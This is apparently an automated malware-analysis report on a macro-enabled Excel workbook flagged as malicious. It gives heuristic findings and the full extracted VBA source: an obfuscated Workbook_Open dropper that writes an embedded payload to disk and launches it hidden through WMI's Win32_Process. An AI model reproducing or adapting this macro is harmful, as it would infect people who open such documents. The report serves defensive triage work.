Verdict: MALICIOUS
Risk score: 110
Heuristics: 5
- VBA project inside OOXML (severity: medium; 3 related findings; rule OOXML_VBA): Document contains a VBA project — VBA macros present.
- GetObject call (severity: high; rule OLE_VBA_GETOBJ): GetObject call. Matched line in script:
  Set sKDd_llzjtSmOwvFoWpXhW__QLm = GetObject(Un_icZnyoCsbZcWYftWjqet.rT_zTedUwxLSkaqKK_k_r).SpawnInstance_
- VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  Private Sub Workbook_Open()
- Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8576 bytes | 0d72e01ede9925dde5be27701ced9e78443c7ec652241eb5f853465c2b033c43 |
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 119 of 236 identifiers look randomly generated (e.g. 'IJDDVKPLgCzk_oDzjjoORvkRoUbogX') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsNull (YhPlffeoOjzh)
IsError ("BPkk3OkHZMO6")
Pj4Rr1f_o0qisQ = IsMissing(IsObject(K77Ug9n))
G_eoMPfNlEFnJx.fZxOghdfFDRHPVKbyPCoKA__bcTt
IYQ9a0Q = IsNull(IsEmpty(oCHLJ3))
jbVfST_7R5b5 = IsDate(IsObject(EUwtmxz))
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "nEAacyWypNGnso_UqQKY"
Attribute VB_Base = "0{0BFAB574-1335-42CB-A04E-FFE1FFCD5530}{2F5A7568-DF14-4F2F-804C-1CB75105E1B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function mfbZHmaVft()
PefwUl_2NkynY = IsMissing("ZapC9Y")
IsNull (IsArray("uncR8620V4xz"))
pi7coh = IsNumeric(IsDate(N5LiEC_1HyYj))
mfbZHmaVft = Mid("mUW^EF2%W\tXSLLoa3!fP<2Ba/", 12, 3)
IsObject (TqQKHr)
IsDate (VGAJkRE_Rem5C)
IsNumeric (IsNull(NJYjQYk))
End Function
Function skQfUGAYIiMIPJQcAH_LbebB()
IsDate ("PIJrX3nky26ll")
skQfUGAYIiMIPJQcAH_LbebB = Range("HE173")
IsError (IsDate(mq7zQ0j))
LGXiR0k = IsDate(IsNumeric("OgjmSAs"))
End Function
Attribute VB_Name = "NmeLqu_epiD_ExaiNav"
Function tpKyawAgb__sZHbmwxVJ_NpX()
IsArray (IsMissing(bf4g9ut_3aKm6))
jg8IJ7RT0dAHe = IsObject("QCTCraF9E1aR")
IsEmpty (IsArray(O9fDOVx))
qsBYM2sMqmu = IsDate(Wx4701)
IsObject (Ih6AXz)
IsMissing (IsNull("gvVDbojgZVYl"))
db7VgRK4o39ng = IsNull(IsNull("U36SbBKFCVVx"))
AHfmUXAxmeqaH_kjRIebiJLpTW = nEAacyWypNGnso_UqQKY.mfbZHmaVft
xYLxKQi = IsEmpty(IsEmpty("A1XZpmfSRPg"))
EypeFnobLG0 = IsNull("Qt735voa7mb")
DRVQJ2s = IsEmpty(IsObject(AswWw6o))
tpKyawAgb__sZHbmwxVJ_NpX = Join(Array(Mid("^OtAv/2261.g|+N5&0Y\HHkAY6", 6, 6) & AHfmUXAxmeqaH_kjRIebiJLpTW))
IsError (IsNumeric(VPZWz1l_UwZ9c))
OE3slWidyMhh = IsNull(IsDate(RN20bY))
AjnTm6d_jmZUOb = IsNumeric("NUIPZtE")
End Function
Function GWNUZW_l_wOPkIBszmbzDX()
IsDate ("oRkPq0")
GWNUZW_l_wOPkIBszmbzDX = Range("DL109")
IsObject (Uxyzzq7)
IsEmpty (WoKupC)
End Function
Attribute VB_Name = "Un_icZnyoCsbZcWYftWjqet"
Function rT_zTedUwxLSkaqKK_k_r()
IsDate (IsError(puFwrBFrmJC))
IsDate (L3rlyz_yI0kM)
IsEmpty (IsNumeric(WPfG0bT))
wCDiUw = IsDate(b30MpWLEQ3s)
zS5lkK_fIGgn = IsDate("S2fe5yiCghfM9")
IJDDVKPLgCzk_oDzjjoORvkRoUbogX = ChrW(115)
RcE_bLzjnqAEZER = Chr(58) _
ZAMrUXBkBupBZOuXNDA__ESEC_CZg = ChrW(CLng((xlDialogGridlines Or ((1.50247479061941E-04 * -281) * -829))))
hz_bCnfXf = Chr(CLng((Not -120)))
GC7oCN_RVSzQ = IsMissing("CWSeXX_51yZs")
IsEmpty ("HBlT55t")
IrU_TCFI_shHBFScRJAFV_Y_dmqB = Chr(CLng((Not (xlEdgeTop + (446 + -566#)))))
GpWrfg_f = ChrW(110) _
SniNxXvEapjJQwzgck = ChrW(CLng((0.1099324975892 * 1037)))
SFAvNm_d = Chr(116)
jmG_QmDXalDajnO = Mid("|/$*q96|(M/qx6\cimv2:Win32_ProcessStartupy3lan9vH", 15, 27)
tisjUDIjux = ChrW(CLng((Not -110))) _
r0baGpY = IsDate(IsDate("Mzecrpn"))
dKGFQhEgbY_X_Urthw = ChrW(CLng((-0.181019332161687 * (-814 - (-0.468451242829828 * 523)))))
EnqpcKm = IsDate(IsMissing(ZO8f37))
IsMissing ("EoMUWPmIiERS")
UuHPnwWxIKHeCLppbij = ChrW(CLng((-82 + (0.172382671480144 * (1357 - 249#)))))
rT_zTedUwxLSkaqKK_k_r = hz_bCnfXf + Chr(105) + GpWrfg_f + UuHPnwWxIKHeCLppbij + dKGFQhEgbY_X_Urthw + tisjUDIjux + ChrW(116) + IJDDVKPLgCzk_oDzjjoORvkRoUbogX + RcE_bLzjnqAEZER + ChrW(92) _
+ SniNxXvEapjJQwzgck + IrU_TCFI_shHBFScRJAFV_Y_dmqB + ZAMrUXBkBupBZOuXNDA__ESEC_CZg + SFAvNm_d + jmG_QmDXalDajnO
IsMissing (nJdmPfg)
IsNumeric ("aLrtPOKhYGhe3")
kM4B6Hs_nSU7NF = IsArray("s9MiKHZj0ox")
End Function
Function eMylMhixoADfCL()
IsMissing (IsNull(hxlqTW))
eMylMhixoADfCL = Range("BG129")
O0UuNw2 = IsMissing("M4ojUqk")
IsArray (IsObject("eQzthuR"))
End Function
Attribute VB_Name = "Css_HKYMcdXhqVJomYMIgk_Ho"
Attribute VB_Base = "0{661806D4-A531-45B1-9E5B-347E398CBC98}{DCDB2694-6801-4D7D-95D1-DFDEA612B179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function sKDd_llzjtSmOwvFoWpXhW__QLm()
IsNull ("U0aw01")
IsMissing (IsDate("Y0zlUR"))
IsMissing (IsObject(YKYDU40))
Set sKDd_llzjtSmOwvFoWpXhW__QLm = GetObject(Un_icZnyoCsbZcWYftWjqet.rT_zTedUwxLSkaqKK_k_r).SpawnInstance_
IsEmpty ("SiNnVMdV5oN5")
COUsCj_xC8Tst = IsEmpty("NvBdZR1")
IsArray (dWHnM2)
With sKDd_llzjtSmOwvFoWpXhW__QLm
.ShowWindow = CLng((xlDialogWindowSize And xlImmediatePane))
End With
ro0I0H7 = IsEmpty(IsArray("ypG94e_4U7KoA"))
IsError (Z6cWgo)
IsObject (H9Etnz)
End Function
Attribute VB_Name = "pgyJE_p_WIBpZrVaRpBDANEaEVBG"
Function tSIZ_qpFD()
IsArray (IsNumeric(HeLrpy_JIn0J))
rhDFxL_25T3P = IsNumeric("AA4UnCq_760H5F")
Pdy1eEn = IsMissing("QFDsdc")
IsArray (IsNull("FQLqtl_08zQzk"))
IsEmpty (IsError(Rv4OvZr))
lWdsu_jMQcM = nEAacyWypNGnso_UqQKY.skQfUGAYIiMIPJQcAH_LbebB
L6xjIX_kL2STG = IsObject(IsArray("CTOqQAwWCYfJ"))
vvKCYReWOOVGQVoLDFGcTmYL = Range("BM72")
IsNumeric ("YihEW606rQn9c")
Eoyzgw = IsEmpty(YTYlQWI)
Q2F3xu = IsNull("Jko5d6")
IsArray (IsEmpty(TCVrT8T))
VzeJbJIlhyVo = IsEmpty("Q1IROXs_nAzmge")
blHCyyhCR_BZDO = Mid("<7*$apcd+!&wrQ/:Vpv", 12, 1)
cD3gb2Z_vA5Coo = IsDate(dvy1PK_d5VXv)
HC3G3n_VwqeSQ = IsEmpty(IsEmpty("C5n2bfQ"))
q_mVjHDqxtIWXzFHxROHu = Range("EA250")
tSIZ_qpFD = blHCyyhCR_BZDO & q_mVjHDqxtIWXzFHxROHu & lWdsu_jMQcM & vvKCYReWOOVGQVoLDFGcTmYL
IsEmpty ("ndJv3WQ")
IsEmpty ("oTQnkzyJUVR")
IsNumeric (IsMissing("IsZJKHdG7dp7"))
End Function
Function OmSZYvgiAzsWNrcYZE_KtYI()
IsDate (q4lL2Y_bxJZf0)
IsError (IsArray(uRAHx6f))
CYxgxGgeQgxUM = Un_icZnyoCsbZcWYftWjqet.eMylMhixoADfCL
RsnkyX3 = IsError(IsNull(BJN5T89))
IsDate (IsDate("GWKCuu_2XT0PV"))
lHhrmDd = IsMissing(IsArray(XbEYQZ_AAada))
OmSZYvgiAzsWNrcYZE_KtYI = Join(Array(CYxgxGgeQgxUM + Mid("xxNbbKrEIauj4get /formatvO+(*we", 14, 11) + NmeLqu_epiD_ExaiNav.GWNUZW_l_wOPkIBszmbzDX))
O1MqjL0Rq75n = IsNull("BjAnWp")
IsNumeric (IsDate("cCj0AWT"))
IsNumeric (RV6Sm9xjpAQG)
End Function
Attribute VB_Name = "G_eoMPfNlEFnJx"
Attribute VB_Base = "0{B5216F02-1A2A-45BD-B25D-0E2CD9EED118}{40613307-087E-4FB2-975E-9C47F9B673CF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function fZxOghdfFDRHPVKbyPCoKA__bcTt()
Dim F__oNeOufWVamVUR As String
Y0DHTA = IsDate(IsObject("KEfdIKD"))
eVuuUT5ZFdXP = IsDate(BeYV13V6p8QL)
F__oNeOufWVamVUR = Replace(nEAacyWypNGnso_UqQKY.ArEjTVtbLtespyYMTInADeril.Text, "gPjOnb", "")
KmQ3R5GEdVRr = IsObject(IsDate(O1FBuR))
IQRRB9v5ct52 = IsDate(IsNull("jfwo7ZmcjBQb"))
XyLm2EZ = IsNull(WBIKzBW)
Open Application.ActiveWorkbook.Path & NmeLqu_epiD_ExaiNav.tpKyawAgb__sZHbmwxVJ_NpX For Binary As #CLng((xlMoveAndSize And xlOutline))
IsNull (IsNull(DtEE9wfvlan))
SFPOs1Q_lRqK6 = IsDate(IsDate(kAxDXv_rrP2j))
Put #CLng((Not (-1.75438596491228E-02 * 114))), , F__oNeOufWVamVUR
IsArray (IsDate("Y246BlI_WbIbS"))
IsArray (IsNumeric("YHkekQH_HccJR"))
Close #CLng((xlPrintErrorsBlank And xlPaperLetter))
hThyf4 = IsNull(IsNull("ZxZLuA"))
IsDate (chTjif5glTWs)
udoOgecOH
PZlIDqV = IsDate("HHleLxz")
IsObject (AMKoV97)
End Function
Function udoOgecOH()
v5PuZB_uZXTRr = IsEmpty(sqc1sBe_3xRBEh)
IsDate (Dqukqo)
IsObject (IsEmpty(TQnahFw_DkBtv))
With GetObject(pgyJE_p_WIBpZrVaRpBDANEaEVBG.tSIZ_qpFD)
.Create pgyJE_p_WIBpZrVaRpBDANEaEVBG.OmSZYvgiAzsWNrcYZE_KtYI & Chr(34) & Application.ActiveWorkbook.Path & NmeLqu_epiD_ExaiNav.tpKyawAgb__sZHbmwxVJ_NpX & Chr(34), Null, Css_HKYMcdXhqVJomYMIgk_Ho.sKDd_llzjtSmOwvFoWpXhW__QLm
End With
QaClkKRHxLhY = IsMissing(IsEmpty("SR0las"))
IsArray ("arLldT")
IsDate ("Q6kS14")
TmKduh_kwnpZ = IsMissing("ABD4Z6d")
End Function
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 56832 bytes | a01c3d4b04d0a6f3b23771556da1e338374e797ad7a3791adadcd45675aa091c |
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 575 of 954 identifiers look randomly generated (e.g. 'gPjOnbQVngPjOnb2w_0NgPjOnbN_iop6gPjOnb_d') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).